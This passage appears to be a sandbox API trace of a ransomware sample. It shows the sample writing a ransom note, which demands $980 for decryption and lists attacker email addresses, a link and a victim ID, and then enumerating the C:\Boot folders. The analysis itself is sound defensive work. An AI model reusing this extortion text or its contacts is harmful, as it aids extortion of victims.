0x7516fe8 [0127.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0127.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0127.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0127.797] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0127.797] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.797] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0127.797] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0127.798] CloseHandle (hObject=0x5c4) returned 1 [0127.798] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0127.798] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0127.798] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0127.798] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.798] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.798] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36572c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0127.798] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.798] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36572c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.798] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0127.799] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0127.799] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0127.799] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0127.799] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0127.799] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce93e0 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8490 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.799] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x38) returned 0xdce3a70 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8490 | out: hHeap=0x4970000) returned 1 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.799] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x54) returned 0xdd08cc8 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8490 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce98e0 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce3a70 | out: hHeap=0x4970000) returned 1 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.799] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2b90 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce90e8 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97f0 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8490 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce98e0 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.800] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa8) returned 0x74bf8f0 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce98e0 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8490 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9c78 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9520 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce90e8 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97f0 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2b90 | out: hHeap=0x4970000) returned 1 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.800] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.800] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97f0 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.800] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xfc) returned 0xdd24260 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce90e8 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce96d8 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9bb0 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9908 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9250 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce98e0 | out: hHeap=0x4970000) returned 1 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8490 | out: hHeap=0x4970000) returned 1 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9c78 | out: hHeap=0x4970000) returned 1 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9520 | out: hHeap=0x4970000) returned 1 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97f0 | out: hHeap=0x4970000) returned 1 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97f0 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.801] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.801] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9520 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.802] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x16c) returned 0xdd1ba90 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9c78 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8490 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce98e0 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9228 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9e80 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8fd0 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce90c0 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9a70 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce94a8 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce90e8 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce96d8 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9bb0 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9908 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9250 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97f0 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9520 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9520 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.802] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, 